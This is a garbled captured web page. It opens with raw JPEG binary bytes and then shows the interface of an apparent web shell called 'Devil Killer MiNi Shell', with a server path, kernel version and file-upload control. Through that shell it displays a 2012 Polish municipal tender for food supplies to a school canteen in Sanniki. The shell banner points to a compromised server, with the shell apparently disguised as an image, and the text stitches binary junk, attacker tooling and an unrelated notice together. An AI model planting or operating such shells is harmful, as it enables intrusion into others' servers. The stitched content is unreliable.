JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120816/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120816/177289-N-2012.html

<p class="kh_header"><b>Sanniki: Zakup i dostawa artykułów spożywczych do stołówki Szkoły Podstawowej im. Fryderyka Chopina w Sannikach i Przedszkola Samorządowego w Sannikach w roku szkolnym 2012-2013</b><br>
<b>Numer ogłoszenia: 177289 - 2012; data zamieszczenia: 16.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sanniki , ul. Warszawska 169, 09-540 Sanniki, woj. mazowieckie, tel. 24 277 68 51, faks 24 277 68 51, 277 78 15.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sanniki.bip.org.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa artykułów spożywczych do stołówki Szkoły Podstawowej im. Fryderyka Chopina w Sannikach i Przedszkola Samorządowego w Sannikach w roku szkolnym 2012-2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup i dostawa artykułów spożywczych do stołówki Szkoły Podstawowej im. Fryderyka Chopina w Sannikach i Przedszkola Samorządowego w Sannikach w roku szkolnym 2012/2013. 
kod CPV:
15.00.00.00-8  żywność, napoje, tytoń i produkty pokrewne
Zamówienie obejmuje artykuły spożywcze z następujących grup asortymentowych:
Część I:  mięso, produkty mięsno-wędliniarskie i drób
kod CPV: 15100000-9
Planowane zapotrzebowanie miesięczne na wskazane artykuły spożywcze: 
Lp. Nazwa produktu ilość jednostka
1. schab z kością	19 kg
2. schab bez kości 20 kg
3. pachwina wędzona 7	kg
4. łopatka bez kości 41 kg
5. żeberka 44 kg
6. wołowina rosołowa 3	kg
7. golonka 5 kg
8. mięso mielone 22 kg
9. mięso na gulasz 20 kg
10. flaki drobiowe	13 kg
11. boczek	8 kg
12. wołowina bez kości 10 kg
13. wątróbka wieprzowa 6 kg
14. kiełbasa podwawelska 12 kg
15. kiełbasa biała surowa 12 kg
16. kiełbasa zwyczajna	2 kg
17. kiełbasa szynkówka	5 kg
18. kiełbasa śląska 2 kg
19. kaszanka 1 kg
20. pasztetowa 2	kg
21. salceson 2 kg
22. szynka z indyka 10 kg
23. szynka 6 kg
24. pasztet drobiowy (puszka)- 155 g 10 szt.
25. kiełbasa parówkowa	7 kg
26. mortadela 2 kg
27. kurczaki	 48 kg
28. udka 22	kg
29. żołądki 6 kg
30. piersi z kością  26 kg
31. porcje rosołowe 12 kg
32. skrzydełka 33 kg
33. filet z kurczaka 20 kg
34. wątróbka drobiowa	10 kg
35. pałeczki z kurczaka	40 kg
36. serduszka drobiowe	10 kg
Część II: mleko i przetwory mleczne
kod CPV: 15500000-3
Planowane zapotrzebowanie miesięczne na wskazane artykuły spożywcze: 
Lp.	Nazwa produktu	ilość	jednostka
1. ser biały - półtłusty - 60 kg
2. mleko w folii 2% - 93 litry
3. śmietana 30% (0,5l) - 111 szt.
4. masło śmietankowe - 200g	80 szt.
5. masło roślinne w kubku - 250g 23	szt.
6. serek Danio lub równoważny - 150g 192 szt.
7. serek Twój smak lub równoważny - 200g 15 szt.
8. ser żółty żółty Gouda lub równoważny - 4 kg
9. jogurt (mały)- 120g -  250 szt.
10. jogurt naturalny 390g -  18 szt.
11. jogurt smakowy 150g - 240 szt.
12. masło ostrołęckie lub równoważne - 200g 43 szt.
13. Lody w kubku Ice Mastry 300ml	- 50 szt.
Część III: owoce i przetwory owocowe
kod CPV: 15300000-1
Planowane zapotrzebowanie miesięczne na wskazane artykuły spożywcze: 
Lp. Nazwa produktu Ilość jednostka
1. jabłka -  103 kg
2. cytryny -  14 kg
3. banany -  40 kg
4. dżem brzoskwiniowy 280g z Łowicza lub równoważny -  8	szt.
5. dżem truskawkowy 380g z Łowicza lub równoważny -  41	szt.
6. dżem wiśniowy  280g Łowicz  lub równoważny -  25 szt.
7. powidła śliwkowe 400g - 2 szt.
8. kompot wiśniowy - 8	litry
9. sok Paola 440 ml lub równoważny -  112 szt.
10. kompot truskawkowy -  6	litry
11. mandarynki - 	10 kg
12. truskawki(produkty sezonowe) -  8 kg
13. winogron - 4 kg
Część IV:  warzywa i przetwory warzywne - kod CPV: 15300000-1
Planowane zapotrzebowanie miesięczne na wskazane artykuły spożywcze: 
Lp. Nazwa produktu 	ilość	jednostka
1. ziemniaki -  672 kg
2. ziemniaki młode - 43 kg
3. marchew - 71 kg
4. pietruszka -  19 kg
5. por	 - 20	kg
6. pieczarki -  8 kg
7. pomidory - 13 kg
8. ogórki świeże - 25 kg
9. groch -  6 kg
10. koper - 	43 pęczki
11. natka pietruszki -  23 pęczki
12. cebula - 10 kg
13. kapusta pekińska - 	11 kg
14. kapusta biała - 8 kg
15. kapusta młoda w sezonie -  13 szt.
16. kapusta kwaszona - 37 kg
17. seler - 17 kg
18. Fasola szparagowa - 2 kg
19. Fasola -	5 kg
20. kalafior świeży - 4 kg
21. kalafior mrożony 450 g - 8 szt.
22. fasola mrożona 450g - 3 szt.
23. sałata - 13 szt.
24. koncentrat pomidorowy 30% 190g - 40 szt.
25. rzodkiewka - 	7 pęczki
26. chrzan biały w słoiku 200g	 - 2 szt.
27. kapusta czerwona -  3 kg
28. ogórki kwaszone -  13 kg
29. kapusta włoska - 4 szt.
30. przecier szczawiowy siekany w słoiku 200 g - 12 szt.
31. ogórki konserwowe 900 ml -  31	słoiki
32. buraki ćwikłowe - 35 kg
33. kukurydza w puszcze 400 g - 10 szt.
34. brokuły świeże - 3 kg
35. szczypiorek - 	10 pęczki
36. groszek zielony w puszce  400g - 10 szt.
37. włoszczyzna - 63 pęczki
38. papryka surowa -  3 kg.
39. czosnek -  2 szt.
Część V:  przyprawy, makarony, mąki i kasze
kod CPV: 1540000-2, 15600000-4, 15800000-6
Planowane zapotrzebowanie miesięczne na wskazane artykuły spożywcze: 
Lp. ilość jednostka
1. mąka szymanowska lub równoważna typ 480	- 15 kg
2. mąka pszenna typ 500 -  9	kg
3. makaron świderki  400g -  30 szt.
4. kasza manna  Kupiec lub równoważna - 3 kg
5. ryż Kupiec lub równoważny	- 14 kg
6. ryż w saszetkach 400 g - 4 szt. 
7. kasza jęczmienna Kupiec lub równoważna - 10 kg
8. kasza jęczmienna w saszetkach 400g - 19 szt.
9. cukier -  110 kg
10. sól -  18 kg
11. kwasek cytrynowy 50g -  15 szt.
12. liść laurowy 7 g -  9	 szt.
13. ketchup 900 g - 5 szt.
14. ketchup łagodny w tubce Włocławek lub równoważny - 	1 szt.
15. mąka ziemniaczana - 3 kg
16. makaron rosołowy 250 g Vela lub równoważny - 67 szt.
17. Przyprawa Vegeta lub równoważna  200g - 75 szt.
18. barszcz biały 65 g - 51 szt.
19. majeranek 20g - 13	szt.
20. papryka słodka mielona 20g - 4 szt.
21. pieprz mielony 20g - 12 szt.
22. ziele angielskie 20g - 3 szt.
23. kostki rosołowe drobiowe 60 g - 30 szt.
24. bulion w butelce 200g - 5	szt.
25. płatki czekoladowe 500g Nestle (kulki) lub równoważne - 5 szt.
26. płatki kukurydziane 500g Cornflkes lub równoważne - 5 szt.
27. jajka duże -  618 szt.
28. smalec 200 g - 25 szt.
29. herbata granulowana 90g - 11 szt.
30. olej uniwersalny 1 litrowy Kujawski lub równoważny - 45	szt.
31. majonez  620 g pomorski Ocetix lub równoważny - 14 szt.
32. ocet 0,5 l 10% - 3 szt.
33. batony  43g - 52 szt.
34. cukier waniliowy 16 g Delekta lub równoważny - 14 szt.
35. planta (tłuszcz do smażenia) 200g lub równoważny - 8 szt.
36. sos sałatkowy 9g Knorr lub równoważny - 11 szt.
37. sos buraczany 200g	 - 1 szt.
38. żurek 0,5 l - 2 szt.
39. cynamon 15g - 1 szt.
40. pieprz w ziarnach 20g - 2	szt.
41. pieprz mielony 20g - 1 szt.
42. sos pieczarkowy 34g - 12	szt.
43. sos grzybowy 40g - 14 szt.
44. budyń 64g Delecta lub równoważny - 20 szt.
45. kisiel 58g Delecta lub równoważny - 30 szt.
46. galaretka 75gDelecta lub równoważna - 20 szt.
47. przyprawa do kurczaka 35g - 5 szt.
48. herbata ekspresowa (100 torebek) Saga lub równoważna - 6 szt.
49. krem czekoladowy NUTELLA 180g lub równoważny - 10 szt.
50. kakao granulowane Puchatek lub równoważne   350g - 4 szt.
51. kawa zbożowa INKA 150 g lub równoważna -  4 szt.
52. sos słodko-kwaśny (mały) 350g - 29 szt.
53. zupa fasolowa 66 g -20 szt.
54. zupa grochowa 55 g - 20	szt.
55. zupa pieczarkowa 45 g - 20 szt.
56. Batony Grześki w polewie lub równoważne 28g - 221 szt.
57. Batony Grześki bez polewy lub równoważne  28g - 5 szt.
58. Batony 50g Góralki lub równoważne - 120 szt.
59. soczek ze słomką 200 ml - 205 szt.
60. musztarda mała 210 g - 3	szt.
61. Musztarda 280g sarepska w tubce Kamis lub równoważna - 1 szt.
62. Miód naturalny wielokwiatowy 350g Podravka lub równoważny - 2 szt.
CzęśćVI:  ryby 
kod CPV: 15200000-0
Planowane zapotrzebowanie miesięczne na wskazane artykuły spożywcze: 
Lp. Nazwa produktu ilość jednostka
1. ryba panga - 19 kg
2. ryba mrożona dorsz - 10 kg
3. ryba mrożona miruna - 13 kg
Część VII:  pieczywo 
kod CPV: 15810000-9
Planowane zapotrzebowanie miesięczne na wskazane artykuły spożywcze: 
Lp. Nazwa produktu  ilość   jednostka
1. pączki - 	94 szt.
2. bułka słodka z kruszonką - 	25 szt.
3. bułka słodka z dżemem -  25 szt.
4. bułka słodka z budyniem - 	25 szt.
5. chleb krojony - 2 szt.
6. chleb razowy -  10 szt.
7. chleb pełnoziarnisty (krojony) -  20 szt.
8. chleb cały 0,60kg -  85 szt.
9. bułki grahamki -  33 szt.
10. bułki poznańskie - 38 szt.
11. bułki kajzerki - 370 szt.
12. bułka tarta - 	42 szt.
13. precelki - 19 szt.
14. ciasto drożdżowe - 2 kg.
Wszystkie nazwy produktów podane przez Zamawiającego w specyfikacji istotnych warunków zamówienia należy traktować jako standardy jakościowe. Zamawiający dopuszcza możliwość zaoferowania artykułów równoważnych. Jakość artykułów równoważnych  nie może być gorsza od jakości produktów określonych nazwą. Artykuł rówoważny powinien mieć parametry nie gorsze niż wskazany z nazwy produkt. W przypadku zaoferowania przez Wykonawcę artykułu równoważnego należy podać nazwę artykułu i producenta.
Dostawa artykułów żywnościowych do stołówki Szkoły Podstawowej im. Fryderyka Chopina w Sannikach i Przedszkola Samorządowego w Sannikach odbywać się będzie w ilościach wcześniej zamówionych przez intendentki..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9, 15.50.00.00-3, 15.30.00.00-1, 15.30.00.00-1, 15.40.00.00-2, 15.60.00.00-4, 15.80.00.00-6, 15.20.00.00-0, 15.81.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 03.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków udziału w postępowaniu. Ocena spełniania warunków udziału w postępowaniu dokonywana będzie w oparciu o oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu na podstawie art.22 ust.1 Ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków udziału w postępowaniu. Ocena spełniania warunków udziału w postępowaniu dokonywana będzie w oparciu o oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu na podstawie art.22 ust.1 Ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków udziału w postępowaniu. Ocena spełniania warunków udziału w postępowaniu dokonywana będzie w oparciu o oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu na podstawie art.22 ust.1 Ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków udziału w postępowaniu. Ocena spełniania warunków udziału w postępowaniu dokonywana będzie w oparciu o oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu na podstawie art.22 ust.1 Ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków udziału w postępowaniu. Ocena spełniania warunków udziału w postępowaniu dokonywana będzie w oparciu o oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu na podstawie art.22 ust.1 Ustawy Prawo zamówień publicznych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykaz pozostałych dokumentów składających się na ofertę: Formularz ofertowy - załącznik nr 1 do SIWZ, Kalkulacja cenowa - załącznik nr 5 do SIWZ. Wykonawca wypełnia formularz ofertowy oraz kalkulację cenową w zakresie oferowanych do wykonania części. Dokumenty wymagane w przypadku składania oferty wspólnej. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim przypadku dla ustanowionego pełnomocnika do oferty należy załączyć pełnomocnictwo do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i do zawarcia umowy. Oferta winna zawierać: oświadczenia i dokumenty opisane w pkt. III.4.2) oraz Oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu na podstawie art. 22 ust.1 Ustawy - Prawo zamówień publicznych- wg załącznika nr 2 do SIWZ dla każdego wykonawcy z osobna, pozostałe dokumenty mogą być złożone wspólnie. Dokumenty podmiotów zagranicznych. Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. III.4.3.1) zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sadowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - wystawione z odpowiednią datą wymaganą dla tych dokumentów. Formularz ofertowy - załącznik nr1 do SIWZ. 3.2. Kalkulacja cenowa - załącznik nr 5</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wszelkie zmiany i uzupełnienia treści niniejszej umowy mogą być dokonane za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności. 2. Zamawiający dopuszcza możliwość dokonania w umowie następujących zmian: 2.1.zmiana gramatury dostarczanych produktów w przypadku wprowadzenia przez producenta innej gramatury niż określona w ofercie Wykonawcy, 2.2. zmiana asortymentu w przypadku wstrzymania, zaprzestania produkcji, wycofania z rynku lub zmiany marki, z zastrzeżeniem, iż oferowany zamiennik musi odpowiadać parametrom co najmniej takim jak oferowany produkt, z gwarancję zachowania oferowanej ceny, 2.3. zmiana cen produktów w przypadku, gdy z powodu istotnej zmiany ceny nieprzewidzianej przy zawarciu umowy, spełnienie przedmiotu umowy groziłoby jednej ze stron rażącą stratą</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sanniki.bip.org.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Sannikach
ul. Warszawka 169,
09-540 Sanniki,
pokój nr 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.08.2012 godzina 10:20, miejsce: Urząd Gminy w Sannikach
ul. Warszawka 169,
09-540 Sanniki,
pokój nr 14 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Mięso, produkty mięsno - wędliniarskie i drób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.Nazwa produktu, ilość,  jednostka
1. schab z kością	19 kg
2. schab bez kości 20 kg
3. pachwina wędzona 7	kg
4. łopatka bez kości 41 kg
5. żeberka 42 kg
6. wołowina rosołowa 3 kg
7. golonka 5 kg
8. mięso mielone 22 kg
9. mięso na gulasz 20 kg
10. flaki drobiowe	13 kg
11. boczek	8 kg
12. wołowina bez kości 10 kg
13. wątróbka wieprzowa 6 kg
14. kiełbasa podwawelska 12 kg
15. kiełbasa biała surowa 12 kg
16. kiełbasa zwyczajna	2 kg
17. kiełbasa szynkówka	5 kg
18. kaszanka 1 kg
19. kiełbasa śląska 2 kg
20. pasztetowa 2	kg
21. salceson 2 kg
22. szynka z indyka 10 kg
23. szynka	6 kg
24. pasztet drobiowy (puszka)- 155 g 10 szt.
25. kiełbasa parówkowa	 35 kg
26. mortadela 2 kg
27. kurczaki	 48 kg
28. udka 22	kg
